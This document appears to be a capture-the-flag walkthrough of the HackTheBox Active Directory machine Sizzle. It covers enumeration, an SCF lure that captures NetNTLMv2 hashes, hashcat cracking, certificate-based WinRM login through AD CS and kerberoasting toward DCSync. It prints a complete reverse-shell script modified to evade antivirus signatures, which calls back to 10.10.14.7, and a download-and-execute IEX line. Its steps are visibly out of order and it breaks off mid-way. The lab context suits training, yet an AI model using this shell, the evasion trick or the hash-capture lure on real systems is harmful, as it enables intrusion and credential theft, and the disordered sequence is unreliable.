PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -34s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
443/tcp open ssl/http Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
| tls-alpn:
| h2
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
|_http-title: Site doesn't have a title (text/html).
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-12-14T00:52:29
|_ start_date: 2023-12-14T00:48:26
|_clock-skew: mean: -33s, deviation: 0s, median: -33s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.99 seconds
From the results we can see:
the domain name HTB.LOCAL; let's add this to our hosts file
the host name sizzle (certificate common name sizzle.htb.local); we'll add this to the hosts file as well
port 21 (FTP) allows anonymous authentication
port 80 (HTTP) is running Microsoft IIS httpd 10.0, and the Service Info line confirms a Windows host; with LDAP and the global catalog ports (389/636/3268/3269), kpasswd (464) and SMB (445) open, this is the domain controller for HTB.LOCAL. Note that Kerberos (88/tcp) does not appear in the scan, which matters later
Initial Enumeration via Anonymous Access
Port 53 DNS
Let's see if we can perform a zone transfer using dig
dig axfr @10.10.10.103 htb.local
No results (the transfer is refused)
Port 21 FTP
Since anonymous authentication is permitted on the FTP service, let's see if we can find any juicy information
ftp anonymous@10.10.10.103
authentication was successful
No files of interest within FTP
Port 445 SMB
Let's see if SMB allows anonymous authentication
crackmapexec smb 10.10.10.103 -u anonymous -p ''
successful
Let's list the shares and see if we can find anything
crackmapexec smb 10.10.10.103 -u anonymous -p '' --shares
spider_plus (crackmapexec smb 10.10.10.103 -u anonymous -p '' -M spider_plus) will crawl every share we can read and dump what they contain into a JSON file, saved at /tmp/cme_spider_plus/<target ip>.json
Let's clean up the JSON file (for example with jq .) so it is easier to view
If we look at the Users directory we can see a list of possible users for the machine
We can save this listing to a file and do some bash kung fu to clean it up, keeping only the first column (the directory name)
cat users | awk '{print $1}' > usernames.txt
Let's mount the Department Shares share on our local machine for ease of inspecting these files
sudo mount -t cifs -o guest '//10.10.10.103/Department Shares' /mnt
(-o guest makes mount.cifs connect as a guest instead of prompting for a password, which is what we want for an anonymous session)
Let's see if we have any write access within the share
For this we can use the tool smbcacls. What does it do?
It sets or gets the Access Control List on an NT file or directory; essentially we can use it to check for writeable files and directories within the Department Shares share
#!/bin/bash
# Walk two levels below the mount point and ask the server for the ACL of
# each directory; report any that grant Everyone FULL control or an explicit
# write bit, which is what we need in order to drop a file there.
# find handles names with spaces, which $(ls ...) would split on.
find /mnt -mindepth 2 -maxdepth 2 -type d -print0 |
while IFS= read -r -d '' path; do
    rel="${path#/mnt/}"    # path relative to the share root
    # -N: no password (anonymous). Query the share directly rather than the
    # mount so we see the server-side ACL, not the local CIFS mapping.
    # An ACE looks like ACL:Everyone:ALLOWED/OI|CI/FULL or .../RWXD.
    if smbcacls "//10.10.10.103/Department Shares" "$rel" -N 2>/dev/null |
       grep -i 'everyone' | grep -Eiq '/(full|[rwxd]*w[rwxd]*)$'; then
        echo "[*] Directory $rel: Write permissions"
    fi
done
Once we run this script
bash find_writeable.sh
we can see the directories that grant write permissions (Users/Public is one of them)
We are going to create an SCF file whose icon path points at an SMB share on our own machine; when a user's Explorer renders the folder it will try to fetch that icon and authenticate to us, so we can capture the user's NetNTLMv2 response. The SCF file needs a [Shell] section with an IconFile= line pointing at our share (\\10.10.14.7\shrek123\...)
We are going to place this SCF file within the writeable directory Users/Public in the SMB share: cp file.scf /mnt/Users/Public
When a user opens this directory, Explorer parses the SCF file and makes an SMB connection back to our machine, where we are running impacket-smbserver to capture the user's NetNTLMv2 hash
impacket-smbserver shrek123 ./ -smb2support
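The SCF lure itself, as an added example rather than a file from the original write-up: the function builds the file and a second helper reads back the UNC path so it can be checked before it goes into the share. It assumes the attacker IP 10.10.14.7 and the share name shrek123 from the impacket-smbserver command above; the file name @lure.scf and the /tmp output path are our own choices (a leading '@' only makes the file sort first in Explorer).

```bash
#!/bin/bash
# Added example: build the SCF lure and verify the UNC target it points at.
# Assumptions: attacker IP 10.10.14.7 and share shrek123 match the
# impacket-smbserver invocation; file name and output directory are ours.
set -eu

make_scf() {
    # $1 = attacker IP, $2 = share name, $3 = output path
    # Explorer resolves IconFile as soon as the folder is listed, so the UNC
    # path only has to be reachable; the .ico itself never needs to exist.
    ip="$1"; share="$2"; out="$3"
    # printf turns '\\\\' into '\\' and '\\' into '\', giving \\IP\share\icon.ico
    # CRLF line endings keep the file looking like one Windows wrote.
    printf '[Shell]\r\nCommand=2\r\nIconFile=\\\\%s\\%s\\icon.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n' \
        "$ip" "$share" > "$out"
}

scf_iconfile() {
    # Prints the IconFile target of an SCF file (CR stripped), for checking.
    tr -d '\r' < "$1" | sed -n 's/^IconFile=//p'
}

make_scf 10.10.14.7 shrek123 '/tmp/@lure.scf'
scf_iconfile '/tmp/@lure.scf'
# then drop it into the writeable directory found with find_writeable.sh:
#   cp '/tmp/@lure.scf' '/mnt/Users/Public/'
```

The share name in IconFile must match what impacket-smbserver exports, otherwise the client still authenticates (the NTLM exchange happens at session setup, before the tree connect) but the response is easier to confirm when the share name lines up in the server log.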
We wait a few minutes and we have the NetNTLMv2 hash of the user amanda
Let's crack the password using hashcat. Quick tip: as we know this is a NetNTLMv2 hash we need to find the correct hashcat mode, and we can grep it from the help output (hashcat --help | grep -i netntlmv2 shows mode 5600)
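Staging the capture for hashcat, as an added example that is not part of the original write-up: impacket-smbserver prints the NetNTLMv2 response on a single line in the exact layout mode 5600 expects, mixed in with its connection messages, and Explorer reconnects several times so the same user shows up repeatedly. The log lines below are constructed to mimic that output and the hex values are placeholders, not a real capture; the wordlist path is an assumption.

```bash
#!/bin/bash
# Added example: pull well-formed NetNTLMv2 lines out of impacket-smbserver
# output, keep one per user, and print the hashcat command to run on them.
# SAMPLE_LOG is constructed; the hex fields are placeholders.
set -eu

# impacket-smbserver prints a captured response as
#   user::DOMAIN:server_challenge(16 hex):NTProofStr(32 hex):blob(hex)
NETNTLMV2_RE='^[^:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+$'

extract_netntlmv2() {
    # stdin: smbserver console output. Keeps only lines matching the hash
    # layout and collapses repeat connections to one line per user (the
    # first field before '::'); one challenge/response pair is enough.
    grep -E "$NETNTLMV2_RE" | sort -t: -k1,1 -u
}

hashcat_cmd() {
    # $1 = hash file, $2 = wordlist. 5600 = NetNTLMv2 in hashcat --help.
    printf 'hashcat -m 5600 %s %s\n' "$1" "$2"
}

SAMPLE_LOG='[*] Incoming connection (10.10.10.103,49726)
[*] AUTHENTICATE_MESSAGE (HTB\amanda,SIZZLE)
[*] User SIZZLE\amanda authenticated successfully
amanda::HTB:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000c0653150de09d2010000000000000000
[*] Incoming connection (10.10.10.103,49727)
amanda::HTB:8877665544332211:ffeeddccbbaa99887766554433221100:0101000000000000c0653150de09d2010000000000000000
[*] Closing down connection (10.10.10.103,49727)'

printf '%s\n' "$SAMPLE_LOG" | extract_netntlmv2 > /tmp/amanda.hash
hashcat_cmd /tmp/amanda.hash /usr/share/wordlists/rockyou.txt
```

If the server challenge or NTProofStr lengths do not match, the line was wrapped or truncated in the terminal; copy it from a log file (impacket-smbserver accepts -outputfile) rather than from the scrollback.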
For good measure, let's see if any of the files residing in ZZ_ARCHIVE contain any data
Let's create a bash script that flags files which are not made entirely of null bytes, using tr to strip the nulls and xxd to dump whatever is left
#!/bin/bash
# Report every file in ZZ_ARCHIVE that holds at least one non-null byte and
# show the start of its hex dump.
for file in /mnt/ZZ_ARCHIVE/*; do
    [ -f "$file" ] || continue
    # Strip every 0x00 and count what survives; zero means the file is pure
    # padding. Testing only the first bytes of a hex dump would miss data
    # placed after a run of nulls.
    if [ "$(tr -d '\000' < "$file" | wc -c)" -gt 0 ]; then
        echo "Hex dump for non-null file: $file"
        xxd "$file" | head -n 16
        echo "-------------------------"
    fi
done
When we navigate to http://htb.local we can see the following
What we can see is:
we can confirm it is running the Microsoft ASP.NET framework
it is a Windows server
If we look at the page source we can see the following
pretty dry
If we navigate to http://sizzle and http://sizzle.htb.local nothing changes within the webpages, meaning there is most likely no virtual host routing
Port 443 HTTPS
Nothing new
Looking at the certificate we can see the following
If we look at the issuer we can see HTB-SIZZLE-CA, which is a certificate authority, meaning it is likely someone configured a certificate authority on this box; that is interesting
We can see when it was created and when it expires
03 July 2018 - 02 July 2020 (already expired at the time of our scan, so browsers will warn about it)
We can perform some directory busting using feroxbuster to see if we can find any hidden web pages on both HTTP and HTTPS
Re-running the share enumeration with amanda's credentials (amanda:Ashare1972, recovered from the cracked hash), we can see we have read access to other shares now
More particularly the CertEnroll share; we will visit this once we have checked out the other services
Notice the CertEnroll share description: Active Directory Certificate Services share
When opening https://sizzle/certsrv/ we can see the following
Using amanda's credentials amanda:Ashare1972
we can access the Microsoft Active Directory Certificate Services web enrollment page. Now what can we actually do with this, and what is it exactly?
What is Microsoft Active Directory Certificate Services?
Active Directory Certificate Services (AD CS) is a role within the Windows Server OS that implements Public Key Infrastructure (PKI) services. PKI uses cryptographic keys and certificates to secure communication and to authenticate users (hint hint) and devices; its main goal is to ensure the confidentiality and integrity of data
How can we exploit this?
Essentially we are going to generate a key pair and a certificate request, have the CA issue a certificate to us as amanda through certsrv, and then use that certificate to authenticate when PSRemoting into the machine
Steps
Generate a private key using openssl
openssl genrsa -aes256 -out amanda.key 2048
# you will be prompted for a passphrase; we use "password"
We want to generate a new certificate signing request (CSR) using our newly created private key amanda.key
openssl req -new -key amanda.key -out amanda.csr
Now we want to get our certificate signing request signed by AD CS: we open amanda.csr, copy its contents and paste them into the advanced certificate request form on the certsrv page, then download the issued certificate in Base64 form
Once we have BloodHound open it is always good practice to mark the users we have owned
amanda's
groups:
USERS
DOMAIN USERS
REMOTE MANAGEMENT USERS
When we list all of the kerberoastable accounts we can see something interesting
mrlky has an SPN set, so it is kerberoastable. Kerberos (88/tcp) did not show up in the port scan, so the roast will have to be performed from inside the box; we'll keep this in mind
Does this MRLKY account have anything we can utilize?
When we look at the user's First Degree Object Control we can see the user MRLKY has the following rights on the HTB.LOCAL domain object:
DCSync
GetChangesAll
GetChanges
Meaning if we can compromise the MRLKY account we can ask the domain controller to replicate directory data to us (the same data held in NTDS.dit, which contains every domain user's password hash)
Looking at the reachable High Value Targets we can see our user amanda CanPSRemote to the SIZZLE.HTB.LOCAL computer. Knowing we have a kerberoastable account MRLKY, we can possibly compromise that account from a remote session and then, as MRLKY, perform a DCSync attack to retrieve the domain hashes
Let's perform an ldapdomaindump for good measure and see if we can find anything else
Now that we have a PSRemote session on the target server, and we know of the kerberoastable user mrlky, we can load PowerView and perform some kerberoasting
Let's load PowerView.ps1 onto the target
Start a python3 web server: python3 -m http.server 80
Download the script and execute it in memory: IEX(iwr http://10.10.14.7/PowerView.ps1 -UseBasicParsing)
What is interesting is that AV detected this; when we try to download the file without executing it we get a permission denied
We can see the lines
Cannot create type. Only core types are supported in this language mode. Meaning we have limited functionality in PowerShell (Constrained Language Mode)
ScriptContainedMaliciousContent meaning AV (AMSI) is scanning what we run
We can check our current language mode in the session
$ExecutionContext.SessionState.LanguageMode
Let's handle one thing at a time. Current objectives:
we need to bypass our current language mode
we need to bypass the AV and execute PowerView.ps1
Bypassing our current language mode
Plan A
Let's upload a nishang reverse shell and see if we can establish another shell without the language constraints
Once we have copied Invoke-PowerShellTcp.ps1 into our current working directory we want to modify it slightly, just to bypass any AV signature that may pick it up
function shrek123
{
<#
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,
[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,
[Parameter(ParameterSetName="bind")]
[Switch]
$Bind
)
try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}
#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
shrek123 -Reverse -IPAddress 10.10.14.7 -Port 9001
Notice we have deleted the comments and changed the function name; hopefully this is basic signature-based detection and we can execute this under the radar
Let's set up a nc listener: rlwrap -cAr nc -lvnp 9001
Set up a python server for our target to download it from: python3 -m http.server 80
Let's use wget (the PowerShell alias for Invoke-WebRequest) and see if we can download the file onto the target
Now let's create a PSCredential object $Cred using amanda's credentials
# create a secure string holding the password
$Password = ConvertTo-SecureString 'Ashare1972' -AsPlainText -Force
# create a PSCredential object
$Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\amanda', $Password)
Now that we have a PSCredential object we can use amanda's credentials to talk to the Kerberos service and request a service ticket for mrlky's SPN; with PowerView loaded we can use
Invoke-Kerberoast -Credential $Cred -Verbose | fl
We now have mrlky's service ticket hash, let's crack it
A couple of quick tips: the hash is printed wrapped over several lines, and since we are using vim as our text editor we want to remove all whitespace and newlines; in vim :%s/\s//g strips the whitespace and :%s/\n//g joins the lines. The ticket is RC4 (etype 23), so the hashcat mode is 13100 (Kerberos 5 TGS-REP)
Now, if we can write to a directory there is something called an SCF (Shell Command File). Essentially it is a small INI-style shortcut file that Windows Explorer parses as soon as the folder containing it is rendered; its IconFile entry can point at a UNC path, and Explorer will connect to that path with the user's credentials to fetch the icon, without the user clicking anything. Now how can this be useful to us?
A quick search tells us we can reach the Microsoft Active Directory Certificate Services web enrollment interface through a web page, located (in our case) at https://sizzle/certsrv/
Now we can utilize our new certificate and key to WinRM into the machine; a quick search shows how to authenticate to WinRM on port 5986 (HTTPS) using a client certificate instead of a password, which is exactly the port our scan showed open
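Putting the certificate steps together (key generation, the CSR, and the WinRM login over 5986), as an added example rather than the write-up's own commands: the script generates the key and a non-interactive CSR, checks that the request is sound before we paste it into certsrv, and shows the evil-winrm invocation for once the CA has issued the certificate. It assumes evil-winrm as the client, that the issued Base64 certificate is saved as amanda.cer next to the key, and that the CA's template builds the subject from AD (the default User template does) so the CN in the CSR is cosmetic; the web enrollment step itself is manual and is not scripted here, and the work directory is our own choice.

```bash
#!/bin/bash
# Added example: client side of certificate-based WinRM authentication.
# Assumptions: evil-winrm is the client, certsrv issues the request and the
# Base64 certificate is saved as <user>.cer beside the key, and the template
# builds the subject from AD so the CSR's CN does not matter.
set -eu

gen_key_and_csr() {
    # $1 = user, $2 = work dir. The key is written without a passphrase so
    # the WinRM client can load the PEM without prompting; protect the file.
    user="$1"; dir="$2"
    mkdir -p "$dir"
    openssl genrsa -out "$dir/$user.key" 2048 2>/dev/null
    # -subj avoids the interactive prompts of openssl req.
    openssl req -new -key "$dir/$user.key" -subj "/CN=$user" -out "$dir/$user.csr"
}

strip_passphrase() {
    # $1 = encrypted key (e.g. one made with genrsa -aes256), $2 = output.
    # Use this if you kept the passphrase-protected key from the steps above.
    openssl rsa -in "$1" -out "$2"
}

csr_ok() {
    # Returns 0 if the CSR parses and its self-signature verifies.
    openssl req -in "$1" -noout -verify >/dev/null 2>&1
}

csr_cn() {
    # Prints the CN we put in the request, as a quick sanity check.
    openssl req -in "$1" -noout -subject | sed -n 's/.*CN *= *//p'
}

winrm_with_cert() {
    # $1 = host, $2 = certificate (PEM), $3 = private key (PEM).
    # -S selects WinRM over TLS (5986); the cert/key pair replaces a password.
    evil-winrm -i "$1" -S -c "$2" -k "$3"
}

WORK="${WORK:-$(mktemp -d)}"
gen_key_and_csr amanda "$WORK"
csr_ok "$WORK/amanda.csr" && echo "[*] CSR ready, paste $WORK/amanda.csr into certsrv (CN=$(csr_cn "$WORK/amanda.csr"))"
# After saving the issued certificate as $WORK/amanda.cer:
#   winrm_with_cert 10.10.10.103 "$WORK/amanda.cer" "$WORK/amanda.key"
```

If the login is refused, check two things first: that the certificate's UPN matches amanda (the CA fills this in from AD when the template builds the subject from directory data) and that the key file is really unencrypted, since a passphrase prompt from the client is the usual symptom of reusing the -aes256 key as-is.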